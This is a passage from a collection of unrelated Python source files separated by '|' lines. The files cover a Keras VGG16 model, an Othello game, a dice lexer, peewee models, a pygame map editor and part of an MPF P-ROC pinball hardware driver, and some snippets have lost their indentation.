    # The schema is expected to leave exactly one candidate FK.
    assert len(fk_fields) == 1
    field = fk_fields[0]
    return _build_search_filter_fk(field)
def _build_search_filter_char(field):
return {
"type": "string",
"label": field.help_text,
"operators": ["contains"],
"validation": {"min": 3},
}
def _build_search_filter_date(field):
return {
"type": "date",
"label": field.help_text,
"operators": ["equal", "before", "after"],
"plugin": "datepicker",
"plugin_config": {"format": "yyyy-mm-dd"},
}
def _build_search_filter_boolean(field):
return {
"type": "boolean",
"label": field.help_text,
"input": "radio",
"values": [{1: "Yes"}, {0: "No"}],
"operators": ["equal"],
}
def _build_search_filter_decimal(field):
return {
"type": "double",
"label": field.help_text,
"operators": ["equal", "less than", "greater than"],
}
|
"""VGG16 model for Keras.
- [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from keras.models import Model
from keras.layers import Flatten, Dense, Input,Lambda
from keras.layers import Convolution2D, MaxPooling2D
from keras.engine.topology import get_source_inputs
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from keras import backend as K
import numpy as np
from keras.applications.imagenet_utils import decode_predictions, preprocess_input
TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
# ImageNet channel means (RGB order), shaped to broadcast over
# channels-first image tensors.
vgg_mean = np.array([123.68, 116.779, 103.939], dtype=np.float32).reshape((3, 1, 1))
def img_preprocess(x):
    """Center on the VGG mean, then reverse axis 1.

    For batched (N, C, H, W) input — as produced by the Lambda layer below —
    axis 1 is the channel axis, so this performs the usual RGB -> BGR flip.
    """
    centered = x - vgg_mean
    return centered[:, ::-1]
def VGG16(include_top=True, weights='imagenet',
          input_tensor=None, input_shape=None,
          classes=1000):
    """Instantiate the VGG16 architecture,
    optionally loading weights pre-trained
    on ImageNet. Note that when using TensorFlow,
    for best performance you should set
    `image_dim_ordering="tf"` in your Keras config
    at ~/.keras/keras.json.
    The model and the weights are compatible with both
    TensorFlow and Theano. The dimension ordering
    convention used by the model is the one
    specified in your Keras config file.
    # Arguments
        include_top: whether to include the 3 fully-connected
            layers at the top of the network.
        weights: one of `None` (random initialization)
            or "imagenet" (pre-training on ImageNet).
        input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
            to use as image input for the model.
        input_shape: optional shape tuple, only to be specified
            if `include_top` is False (otherwise the input shape
            has to be `(224, 224, 3)` (with `tf` dim ordering)
            or `(3, 224, 224)` (with `th` dim ordering).
            It should have exactly 3 inputs channels,
            and width and height should be no smaller than 48.
            E.g. `(200, 200, 3)` would be one valid value.
            Currently ignored — see the shape note in the body.
        classes: optional number of classes to classify images
            into, only to be specified if `include_top` is True, and
            if no `weights` argument is specified.
    # Returns
        A Keras model instance.
    # Raises
        ValueError: for an invalid `weights` value, or when `classes`
            conflicts with ImageNet weights.
    """
    if weights not in {'imagenet', None}:
        raise ValueError('The `weights` argument should be either '
                         '`None` (random initialization) or `imagenet` '
                         '(pre-training on ImageNet).')
    if weights == 'imagenet' and include_top and classes != 1000:
        raise ValueError('If using `weights` as imagenet with `include_top`'
                         ' as true, `classes` should be 1000')
    # Determine proper input shape.
    # NOTE(review): automatic shape inference (`_obtain_input_shape`) was
    # disabled upstream and the Theano-ordered shape is hard-coded, so the
    # `input_shape` argument is currently ignored.
    input_shape = (3, 224, 224)
    if input_tensor is None:
        img_input = Input(shape=input_shape)
    else:
        if not K.is_keras_tensor(input_tensor):
            img_input = Input(tensor=input_tensor, shape=input_shape)
        else:
            img_input = input_tensor
    # Preprocessing baked into the graph (mean subtraction + channel flip)
    # so callers can feed raw images.
    x = Lambda(img_preprocess,input_shape=(3,224,224),output_shape=(3,224,224))(img_input)
    # Block 1
    x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(x)
    x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
    # Block 2
    x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x)
    x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
    # Block 3
    x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x)
    x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x)
    x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
    # Block 4
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x)
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x)
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
    # Block 5
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x)
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x)
    x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
    if include_top:
        # Classification block
        x = Flatten(name='flatten')(x)
        x = Dense(4096, activation='relu', name='fc1')(x)
        x = Dense(4096, activation='relu', name='fc2')(x)
        x = Dense(classes, activation='softmax', name='predictions')(x)
    # Ensure that the model takes into account
    # any potential predecessors of `input_tensor`.
    if input_tensor is not None:
        inputs = get_source_inputs(input_tensor)
    else:
        inputs = img_input
    # Create model.
    model = Model(inputs, x, name='vgg16')
    # load weights
    if weights == 'imagenet':
        if K.image_dim_ordering() == 'th':
            if include_top:
                weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5',
                                        TH_WEIGHTS_PATH,
                                        cache_subdir='models')
            else:
                weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
                                        TH_WEIGHTS_PATH_NO_TOP,
                                        cache_subdir='models')
            model.load_weights(weights_path)
            if K.backend() == 'tensorflow':
                warnings.warn('You are using the TensorFlow backend, yet you '
                              'are using the Theano '
                              'image dimension ordering convention '
                              '(`image_dim_ordering="th"`). '
                              'For best performance, set '
                              '`image_dim_ordering="tf"` in '
                              'your Keras config '
                              'at ~/.keras/keras.json.')
                convert_all_kernels_in_model(model)
        else:
            if include_top:
                weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
                                        TF_WEIGHTS_PATH,
                                        cache_subdir='models')
            else:
                weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
                                        TF_WEIGHTS_PATH_NO_TOP,
                                        cache_subdir='models')
            model.load_weights(weights_path)
            if K.backend() == 'theano':
                convert_all_kernels_in_model(model)
    return model
|
import gsd.hoomd
import argparse
import time
# Wall-clock timer for the whole run (reported at the end).
start = time.time()
parser = argparse.ArgumentParser(description='Subsamble GSD trajectory')
parser.add_argument('fname',metavar='input',type=str,help='trajectory file to be subsampled')
parser.add_argument('ofname',metavar='output',type=str,help='where to write subsampled trajectory file')
parser.add_argument('N',metavar='N',type=int,help='keep frame each N timesteps')
args = parser.parse_args()
# Keep frame 0 verbatim so the output trajectory starts from the full
# initial state (topology, box, etc.).
traj = gsd.hoomd.open(args.fname)
frame0 = traj[0]
newtraj = gsd.hoomd.open(args.ofname,'wb')
newtraj.append(frame0)
# Every Nth subsequent frame is reduced to particle positions only.
# NOTE(review): box, types, velocities, etc. are not copied into the new
# snapshots — confirm that GSD's per-frame defaulting to frame 0 is the
# intended behavior here.
for i in range(args.N,len(traj),args.N):
    s = gsd.hoomd.Snapshot()
    pos = traj[i].particles.position
    s.particles.position = pos
    s.particles.N = len(pos)
    newtraj.append(s)
end = time.time()
print('Subsampling took {0} s.'.format(end-start))
|
"""
othello.py Humberto Henrique Campos Pinheiro
Game initialization and main loop
"""
import pygame
import ui
import player
import board
from config import BLACK, WHITE, HUMAN
import log
logger = log.setup_custom_logger('root')
class Othello:
    """
    Game main class.
    """
    def __init__(self):
        """ Show options screen and start game modules"""
        # start
        self.gui = ui.Gui()
        self.board = board.Board()
        self.gui.show_menu(self.start)
    def start(self, *args):
        """Menu callback: build both players from the chosen settings and
        switch the GUI to the game screen."""
        player1, player2, level = args
        logger.info('Settings: player 1: %s, player 2: %s, level: %s ', player1, player2, level)
        if player1 == HUMAN:
            self.now_playing = player.Human(self.gui, BLACK)
        else:
            # NOTE(review): confirm the meaning of `level + 3` passed to
            # player.Computer (presumably a search depth).
            self.now_playing = player.Computer(BLACK, level + 3)
        if player2 == HUMAN:
            self.other_player = player.Human(self.gui, WHITE)
        else:
            self.other_player = player.Computer(WHITE, level + 3)
        self.gui.show_game()
        # The initial Othello position always has 2 black and 2 white stones.
        self.gui.update(self.board.board, 2, 2, self.now_playing.color)
    def run(self):
        """Main loop: alternate turns at 60 FPS until the game ends, then
        show the winner and restart."""
        clock = pygame.time.Clock()
        while True:
            clock.tick(60)
            if self.board.game_ended():
                whites, blacks, empty = self.board.count_stones()
                if whites > blacks:
                    winner = WHITE
                elif blacks > whites:
                    winner = BLACK
                else:
                    # Equal stone counts: draw.
                    winner = None
                break
            self.now_playing.get_current_board(self.board)
            # A player with no valid moves simply forfeits the turn.
            valid_moves = self.board.get_valid_moves(self.now_playing.color)
            if valid_moves != []:
                score, self.board = self.now_playing.get_move()
                whites, blacks, empty = self.board.count_stones()
                self.gui.update(self.board.board, blacks, whites,
                                self.now_playing.color)
            self.now_playing, self.other_player = self.other_player, self.now_playing
        self.gui.show_winner(winner)
        pygame.time.wait(1000)
        self.restart()
    def restart(self):
        """Reset the board and return to the menu.

        NOTE(review): restart() calls run() which calls restart() again at
        the end of every game, so the call stack grows with each game played.
        """
        self.board = board.Board()
        self.gui.show_menu(self.start)
        self.run()
def main():
    """Create the game object and enter its main loop."""
    Othello().run()
if __name__ == '__main__':
    main()
|
"""
Usage:
run.py mlp --train=<train> --test=<test> --config=<config>
run.py som --train=<train> --test=<test> --config=<config>
Options:
--train Path to training data, txt file.
--test Path to test data, txt file.
--config Json configuration for the network.
"""
from redes_neurais.resources.manager import run_mlp, run_som
import docopt
def run():
    """Parse the command line with docopt and dispatch to the right trainer.

    Prints the usage message when the arguments do not match the pattern
    declared in the module docstring.
    """
    try:
        args = docopt.docopt(__doc__)
        if args["mlp"]:
            run_mlp(args['--config'], args['--train'], args['--test'])
        if args["som"]:
            run_som(args['--config'], args['--train'], args['--test'])
    except docopt.DocoptExit as e:
        # `e.message` is deprecated (and gone in Python 3); str(e) yields
        # the same usage text and works on both Python 2 and 3.
        print(str(e))
if __name__ == "__main__":
    run()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import string
import random
class StringBuf(object):
    """A minimal seekable character stream over an in-memory string."""
    def __init__(self, s):
        self.s = s
        self.pos = 0
    def peek(self):
        """Return the current character without consuming it."""
        return self.s[self.pos]
    def getc(self):
        """Consume and return the current character."""
        ch = self.s[self.pos]
        self.pos += 1
        return ch
    def ungetc(self):
        """Push the most recently read character back onto the stream."""
        self.pos -= 1
    def tell(self):
        """Return the current read position."""
        return self.pos
class Symbol(object):
    """A lexical token: a token-type constant, source position, and value."""
    # Token type constants.
    NUMBER = 0
    D = 1
    PLUS = 2
    MINUS = 3
    def __init__(self, type_, pos, value):
        # Fix: the original definition was missing the colon and body,
        # making the whole module a syntax error.
        self.type = type_
        self.pos = pos
        self.value = value
def next_symbol(s):
    """Read the next token from StringBuf `s` and return it as a tuple.

    Returns (token_type, position, value), where token_type is one of the
    Symbol.* constants, position is the offset of the token's first
    character, and value is the parsed integer for numbers or the literal
    character otherwise.

    Raises ValueError on unrecognized input; IndexError propagates from the
    buffer at end of input (as in the original sketch).
    """
    c = s.getc()
    # Skip leading whitespace.
    while c in string.whitespace:
        c = s.getc()
    # Position of the first character of the token (getc already advanced).
    start = s.tell() - 1
    if c in string.digits:
        # start of a number: accumulate consecutive digits
        literal = c
        c = s.getc()
        while c in string.digits:
            literal += c
            c = s.getc()
        # The last character read was not a digit; push it back.
        s.ungetc()
        return (Symbol.NUMBER, start, int(literal))
    elif c == 'd':
        # die indicator, as in "3d6"
        return (Symbol.D, start, c)
    elif c == '+':
        # plus sign
        return (Symbol.PLUS, start, c)
    elif c == '-':
        # minus sign
        return (Symbol.MINUS, start, c)
    else:
        # unrecognized input
        # Fix: the original concatenated an int onto a str, which raised
        # TypeError instead of the intended ValueError.
        raise ValueError('Syntax error at position ' + str(s.tell()))
|
from __future__ import absolute_import, unicode_literals
from copy import copy
import json
from peewee import Model, CharField, ForeignKeyField, IntegerField
from utils.modules import BaseModule, modules
from utils.modules.api import api as pmb_api
from utils import db
class Action(Model):
    """A single executable step: a method on some module plus its parameters."""
    class Meta:
        database = db
    # Name of the module or "__pmb" for the global one
    module = CharField()
    # Name of the method to call
    method = CharField()
    # JSON encoded parameters
    parameters = CharField()
    def get_info(self):
        """Return the API info describing this action's target method."""
        return get_action_info(self)
    def get_parameters(self):
        """Decode the JSON-encoded parameters into Python objects."""
        return json.loads(self.parameters)
class Command(Model):
    """A named command mapping to an ordered sequence of Actions."""
    class Meta:
        database = db
    # The unique trigger string for this command.
    command = CharField(unique=True)
    def get_actions(self):
        """Return this command's Actions, ordered by their CommandAction.order."""
        # Join Action -> CommandAction -> Command to filter by this command.
        return (
            Action
            .select()
            .join(CommandAction)
            .join(Command)
            .where(Command.id == self.id)
            .order_by(CommandAction.order)
        )
    def clear_actions(self):
        """Delete this command's Actions and the CommandAction link rows."""
        for action in self.get_actions():
            action.delete_instance()
        for commandaction in (
            CommandAction.select()
            .join(Command)
            .where(Command.id == self.id)
        ):
            commandaction.delete_instance()
class CommandAction(Model):
    """Join table linking Commands to Actions with an execution order."""
    class Meta:
        database = db
    command = ForeignKeyField(Command)
    action = ForeignKeyField(Action)
    # Position of the action within the command's sequence (ascending).
    order = IntegerField(default=0)
def get_action_info(action):
    """Return the API info dict describing an Action's target method."""
    return get_info_from_module(action.module, action.method)
def get_info_from_module(module, method):
    """Look up `method` in a module's API ("__pmb" selects the global API).

    Raises KeyError if the module or method is unknown.
    """
    api = pmb_api if module == '__pmb' else modules[module].api
    return api[method]
|
import _plotly_utils.basevalidators
class SourceattributionValidator(_plotly_utils.basevalidators.StringValidator):
    """Validator for the `layout.mapbox.layer.sourceattribution` string
    property (follows plotly's auto-generated validator pattern)."""
    def __init__(
        self,
        plotly_name="sourceattribution",
        parent_name="layout.mapbox.layer",
        **kwargs
    ):
        # Defaults are popped from kwargs so callers can override them.
        super(SourceattributionValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "plot"),
            role=kwargs.pop("role", "info"),
            **kwargs
        )
|
# Count the non-empty lines in birds.txt.  A trailing newline makes
# split("\n") produce a final empty string, which inflates the first count.
with open("birds.txt", "r") as f:
    data = f.read()
lines = data.split("\n")
print("Wrong: The number of lines is", len(lines))
# Fix: the original removed items from `lines` while iterating over it,
# which skips the element following each removal (it only happened to work
# when blank lines were not consecutive).  Filter into a new list instead.
lines = [l for l in lines if l]
print("Right: The number of lines is", len(lines))
|
from boto.ses import SESConnection
import os
def sendmail(name, comment):
    """Notify the site owner via Amazon SES that a new comment arrived.

    AWS credentials are read from the AWS_ACCESS_KEY / AWS_SECRET_KEY
    environment variables; KeyError propagates if they are unset.
    """
    # The owner is both the sender and the sole recipient.
    owner = "patte.wilhelm@googlemail.com"
    subject = "Kommentar eingegangen"
    body = 'Es wurde ein neues Wetter bewertet. Von: ' + name + ': ' + comment
    ses = SESConnection(
        aws_access_key_id=os.environ['AWS_ACCESS_KEY'],
        aws_secret_access_key=os.environ['AWS_SECRET_KEY'],
    )
    ses.send_email(owner, subject, body, [owner])
|
import os
import os.path
import sys
import pygame
from buffalo import utils
from buffalo.scene import Scene
from buffalo.label import Label
from buffalo.button import Button
from buffalo.input import Input
from buffalo.tray import Tray
from camera import Camera
from mapManager import MapManager
from pluginManager import PluginManager
from toolManager import ToolManager
class CameraController:
    """Tracks a free-moving camera position driven by WASD key input."""
    def __init__(self):
        # Float position allows sub-pixel movement; `pos` is the truncated
        # integer position used for blitting.
        self.fPos = (0.0, 0.0)
        self.pos = (int(self.fPos[0]), int(self.fPos[1]))
        self.xv, self.yv = 0.0, 0.0
        self.speed = 1.2
        # Holding shift moves five times faster.
        self.shift_speed = self.speed * 5.0
    def update(self, keys):
        """Recompute velocity from the pressed-key map and advance position."""
        pressed_w = keys[pygame.K_w]
        pressed_a = keys[pygame.K_a]
        pressed_s = keys[pygame.K_s]
        pressed_d = keys[pygame.K_d]
        base = self.shift_speed if keys[pygame.K_LSHIFT] else self.speed
        # Scale by frame time so movement is frame-rate independent.
        base *= utils.delta / 16.0
        # Opposite keys cancel out.
        self.xv = (base if pressed_d else 0.0) - (base if pressed_a else 0.0)
        self.yv = (base if pressed_s else 0.0) - (base if pressed_w else 0.0)
        new_x = self.fPos[0] + self.xv
        new_y = self.fPos[1] + self.yv
        self.fPos = new_x, new_y
        self.pos = (int(new_x), int(new_y))
class EditMapTestScene(Scene):
    """Map-editor scene: a WASD-pannable camera plus a tool tray exposing
    function (select/fill) and area-of-effect (draw/area) mode buttons."""
    def on_escape(self):
        # Escape quits the whole application.
        sys.exit()
    def blit(self):
        # All drawing is delegated to the camera's view of the map.
        Camera.blitView()
    def update(self):
        """Advance one frame: poll keys, move the camera, persist map edits."""
        super(EditMapTestScene, self).update()
        keys = pygame.key.get_pressed()
        self.camera_controller.update(keys)
        Camera.update()
        MapManager.soft_load_writer()
    def __init__(self):
        """Build the scene: camera rig, tool tray, labels, and mode buttons."""
        Scene.__init__(self)
        self.BACKGROUND_COLOR = (0, 0, 0, 255)
        PluginManager.loadPlugins()
        self.camera_controller = CameraController()
        # The camera follows the controller; initial_update positions it now.
        Camera.lock(self.camera_controller, initial_update=True)
        Button.DEFAULT_SEL_COLOR = (50, 50, 100, 255)
        # Fixed-size tray docked to the right edge of the screen.
        self.tool_tray = Tray(
            (utils.SCREEN_W - 270, 20),
            (250, 800),
            min_width=250, max_width=250,
            min_height=250, max_height=800,
            color=(100, 50, 50, 100),
        )
        # Tray header and section labels.
        self.tool_tray.labels.add(
            Label(
                (int(self.tool_tray.width / 2), 10),
                "Tool Tray",
                color=(255,255,255,255),
                x_centered=True,
                font="default24",
            )
        )
        self.tool_tray.labels.add(
            Label(
                (int(self.tool_tray.width / 2), 25),
                "________________",
                color=(255,255,255,255),
                x_centered=True,
                font="default18",
            )
        )
        self.tool_tray.labels.add(
            Label(
                (int(self.tool_tray.width / 2), 50),
                "Function",
                color=(255,255,255,255),
                x_centered=True,
                font="default18",
            )
        )
        # Function mode buttons: each sets the ToolManager state, then
        # re-renders the tray so the selected button is highlighted.
        def set_func_state_to_select():
            ToolManager.set_func_state(ToolManager.FUNC_SELECT)
            self.tool_tray.render()
        self.button_select_mode = Button(
            (15, 80),
            "  Select Mode  ",
            color=(255,255,255,255),
            bg_color=(100,100,200,255),
            font="default12",
            func=set_func_state_to_select,
        )
        self.tool_tray.buttons.add(self.button_select_mode)
        def set_func_state_to_fill():
            ToolManager.set_func_state(ToolManager.FUNC_FILL)
            self.tool_tray.render()
        self.button_fill_mode = Button(
            (self.tool_tray.width - 15, 80),
            "  Fill Mode  ",
            color=(255,255,255,255),
            bg_color=(100,100,200,255),
            invert_x_pos=True,
            font="default12",
            func=set_func_state_to_fill,
        )
        self.tool_tray.buttons.add(self.button_fill_mode)
        self.tool_tray.labels.add(
            Label(
                (int(self.tool_tray.width / 2), 120),
                "________________",
                color=(255,255,255,255),
                x_centered=True,
                font="default18",
            )
        )
        self.tool_tray.labels.add(
            Label(
                (int(self.tool_tray.width / 2), 150),
                "Area of Effect",
                color=(255,255,255,255),
                x_centered=True,
                font="default18",
            )
        )
        # Area-of-effect mode buttons.
        def set_effect_state_to_draw():
            ToolManager.set_effect_state(ToolManager.EFFECT_DRAW)
            self.tool_tray.render()
        self.button_draw_mode = Button(
            (15, 180),
            "  Draw Mode  ",
            color=(255,255,255,255),
            bg_color=(100,100,200,255),
            font="default12",
            func=set_effect_state_to_draw,
        )
        self.tool_tray.buttons.add(self.button_draw_mode)
        def set_effect_state_to_area():
            ToolManager.set_effect_state(ToolManager.EFFECT_AREA)
            self.tool_tray.render()
        self.button_area_mode = Button(
            (self.tool_tray.width - 15, 180),
            "  Area Mode  ",
            color=(255,255,255,255),
            bg_color=(100,100,200,255),
            invert_x_pos=True,
            font="default12",
            func=set_effect_state_to_area,
        )
        self.tool_tray.buttons.add(self.button_area_mode)
        # Register default states and the buttons whose highlight the
        # ToolManager keeps in sync.
        ToolManager.initialize_states(
            ToolManager.FUNC_SELECT, ToolManager.EFFECT_DRAW,
            (
                self.button_fill_mode,
                self.button_select_mode,
                self.button_draw_mode,
                self.button_area_mode,
            ),
        )
        self.tool_tray.render()
        self.trays.add(self.tool_tray)
|
"""Contains the drivers and interface code for pinball machines which use the Multimorphic R-ROC hardware controllers.
This code can be used with P-ROC driver boards, or with Stern SAM, Stern
Whitestar, Williams WPC, or Williams WPC95 driver boards.
Much of this code is from the P-ROC drivers section of the pyprocgame project,
written by Adam Preble and Gerry Stellenberg. It was originally released under
the MIT license and is released here under the MIT License.
More info on the P-ROC hardware platform: http://pinballcontrollers.com/
Original code source on which this module was based:
https://github.com/preble/pyprocgame
"""
from typing import Dict, List
from mpf.core.platform import DmdPlatform, DriverConfig, SwitchConfig, SegmentDisplaySoftwareFlashPlatform
from mpf.devices.segment_display.segment_display_text import ColoredSegmentDisplayText
from mpf.platforms.interfaces.dmd_platform import DmdPlatformInterface
from mpf.platforms.interfaces.segment_display_platform_interface import SegmentDisplaySoftwareFlashPlatformInterface
from mpf.platforms.p_roc_common import PDBConfig, PROCBasePlatform
from mpf.core.utility_functions import Util
from mpf.platforms.p_roc_devices import PROCDriver
MYPY = False
if MYPY: # pragma: no cover
from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import
class PRocHardwarePlatform(PROCBasePlatform, DmdPlatform, SegmentDisplaySoftwareFlashPlatform):
    """Platform class for the P-ROC hardware controller.

    Args:
    ----
        machine: The MachineController instance.
    """
    __slots__ = ["dmd", "alpha_display", "aux_port", "_use_extended_matrix",
                 "_use_first_eight_direct_inputs"]
    def __init__(self, machine):
        """Initialise P-ROC."""
        super().__init__(machine)
        # validate config for p_roc
        self.config = self.machine.config_validator.validate_config("p_roc", self.machine.config.get('p_roc', {}))
        self._configure_device_logging_and_debug('P-Roc', self.config)
        # The driverboard type comes from the platform config if set,
        # otherwise from the machine-wide hardware section.
        if self.config['driverboards']:
            self.machine_type = self.pinproc.normalize_machine_type(self.config['driverboards'])
        else:
            self.machine_type = self.pinproc.normalize_machine_type(self.machine.config['hardware']['driverboards'])
        self.dmd = None
        self.alpha_display = None
        self.aux_port = None
        self._use_extended_matrix = False
        self._use_first_eight_direct_inputs = False
    async def connect(self):
        """Connect to the P-Roc."""
        await super().connect()
        self.aux_port = AuxPort(self)
        self.aux_port.reset()
        # Because PDBs can be configured in many different ways, we need to
        # traverse the YAML settings to see how many PDBs are being used.
        # Then we can configure the P-ROC appropriately to use those PDBs.
        # Only then can we relate the YAML coil/light #'s to P-ROC numbers for
        # the collections.
        if self.machine_type == self.pinproc.MachineTypePDB:
            self.debug_log("Configuring P-ROC for PDBs (P-ROC driver boards)")
            self.pdbconfig = PDBConfig(self, self.machine.config, self.pinproc.DriverCount)
        else:
            self.debug_log("Configuring P-ROC for OEM driver boards")
    def _get_default_subtype(self):
        """Return default subtype for P-Roc."""
        return "matrix"
    def __repr__(self):
        """Return string representation."""
        return '<Platform.P-ROC>'
    def get_info_string(self):
        """Dump infos about boards."""
        infos = "Firmware Version: {} Firmware Revision: {} Hardware Board ID: {}\n".format(
            self.version, self.revision, self.hardware_version)
        return infos
    @classmethod
    def get_coil_config_section(cls):
        """Return coil config section."""
        return "p_roc_coils"
    def configure_driver(self, config: DriverConfig, number: str, platform_settings: dict):
        """Create a P-ROC driver.

        Typically drivers are coils or flashers, but for the P-ROC this is
        also used for matrix-based lights.

        Args:
        ----
            config: Dictionary of settings for the driver.
            number: Number of this driver
            platform_settings: Platform specific setting for this driver.

        Returns a reference to the PROCDriver object which is the actual object
        you can use to pulse(), patter(), enable(), etc.
        """
        # todo need to add Aux Bus support
        # todo need to add virtual driver support for driver counts > 256
        # Find the P-ROC number for each driver. For P-ROC driver boards, the
        # P-ROC number is specified via the Ax-By-C format. For OEM driver
        # boards configured via driver numbers, libpinproc's decode() method
        # can provide the number.
        if self.machine_type == self.pinproc.MachineTypePDB:
            proc_num = self.pdbconfig.get_proc_coil_number(str(number))
            if proc_num == -1:
                raise AssertionError("Driver {} cannot be controlled by the P-ROC. ".format(str(number)))
        else:
            proc_num = self.pinproc.decode(self.machine_type, str(number))
        polarity = platform_settings.get("polarity", None)
        driver = PROCDriver(proc_num, config, self, number, polarity)
        self._late_init_futures.append(driver.initialise())
        return driver
    def configure_switch(self, number: str, config: SwitchConfig, platform_config: dict):
        """Configure a P-ROC switch.

        Args:
        ----
            number: String number of the switch to configure.
            config: SwitchConfig settings.
            platform_config: Platform specific settings.

        Returns: A configured switch object.
        """
        del platform_config
        try:
            # "SD0".."SD7" are the first eight direct inputs; an "X/Y"
            # matrix number with Y > 7 requires the extended matrix.  These
            # two wiring options are mutually exclusive on the hardware.
            if number.startswith("SD") and 0 <= int(number[2:]) <= 7:
                self._use_first_eight_direct_inputs = True
            _, y = number.split('/', 2)
            if int(y) > 7:
                self._use_extended_matrix = True
        except ValueError:
            pass
        if self._use_extended_matrix and self._use_first_eight_direct_inputs:
            # Fixed typo in the error message ("vannot" -> "cannot").
            raise AssertionError(
                "P-Roc cannot use extended matrix and the first eight direct inputs at the same "
                "time. Either only use SD8 to SD31 or only use matrix X/Y with Y <= 7. Offending "
                "switch: {}".format(number))
        if self.machine_type == self.pinproc.MachineTypePDB:
            proc_num = self.pdbconfig.get_proc_switch_number(str(number))
            if proc_num == -1:
                raise AssertionError("Switch {} cannot be controlled by the P-ROC. ".format(str(number)))
        else:
            proc_num = self.pinproc.decode(self.machine_type, str(number))
        return self._configure_switch(config, proc_num)
    async def get_hw_switch_states(self) -> Dict[str, bool]:
        """Read in and set the initial switch state.

        The P-ROC uses the following values for hw switch states:
        1 - closed (debounced)
        2 - open (debounced)
        3 - closed (not debounced)
        4 - open (not debounced)
        """
        switch_states = await self.run_proc_cmd("switch_get_states")
        states = {}
        for switch, state in enumerate(switch_states):
            # States 1 and 3 both mean "closed" (debounced or not).
            states[switch] = bool(state in (1, 3))
        return states
    def configure_dmd(self):
        """Configure a hardware DMD connected to a classic P-ROC."""
        self.dmd = PROCDMD(self, self.machine)
        return self.dmd
    async def configure_segment_display(self, number: str, display_size: int, platform_settings) \
            -> "SegmentDisplaySoftwareFlashPlatformInterface":
        """Configure display."""
        del platform_settings
        del display_size
        number_int = int(number)
        # Bug fix: the original chained comparison `0 < number_int >= 4`
        # only rejected values >= 4 and let negative numbers through.
        if not 0 <= number_int <= 3:
            raise AssertionError("Number must be between 0 and 3 for p_roc segment display.")
        if not self.alpha_display:
            self.alpha_display = AuxAlphanumericDisplay(self, self.aux_port)
        display = PRocAlphanumericDisplay(self.alpha_display, number_int)
        self._handle_software_flash(display)
        return display
    def process_events(self, events):
        """Process events from the P-Roc."""
        for event in events:
            event_type = event['type']
            event_value = event['value']
            if event_type == self.pinproc.EventTypeDMDFrameDisplayed:
                # ignore this for now
                pass
            elif event_type in (self.pinproc.EventTypeSwitchClosedDebounced,
                                self.pinproc.EventTypeSwitchClosedNondebounced):
                self.machine.switch_controller.process_switch_by_num(
                    state=1, num=event_value, platform=self)
            elif event_type in (self.pinproc.EventTypeSwitchOpenDebounced,
                                self.pinproc.EventTypeSwitchOpenNondebounced):
                self.machine.switch_controller.process_switch_by_num(
                    state=0, num=event_value, platform=self)
            else:
                self.log.warning("Received unrecognized event from the P-ROC. "
                                 "Type: %s, Value: %s", event_type, event_value)
class PROCDMD(DmdPlatformInterface):

    """A physical DMD attached to a P-ROC.

    Args:
    ----
        platform: Reference to the MachineController's proc attribute.
        machine: Reference to the MachineController
    """

    __slots__ = ["machine", "platform"]

    def __init__(self, platform, machine):
        """Set up the DMD and push any configured timing to the hardware."""
        self.platform = platform        # type: PROCBasePlatform
        self.machine = machine          # type: MachineController

        # dmd_timing defaults should be 250, 400, 180, 800
        timing_config = self.machine.config['p_roc']['dmd_timing_cycles']
        if timing_config:
            self.platform.run_proc_cmd_no_wait(
                "dmd_update_config",
                Util.string_to_event_list(timing_config))

    def set_brightness(self, brightness: float):
        """Set brightness (only full brightness is supported)."""
        # currently not supported. can be implemented using dmd_timing_cycles
        assert brightness == 1.0

    def update(self, data):
        """Update the DMD with a new frame.

        Args:
        ----
            data: A 4096-byte raw string.
        """
        if len(data) != 4096:
            self.machine.log.warning("Received DMD frame of length %s instead"
                                     "of 4096. Discarding...", len(data))
            return
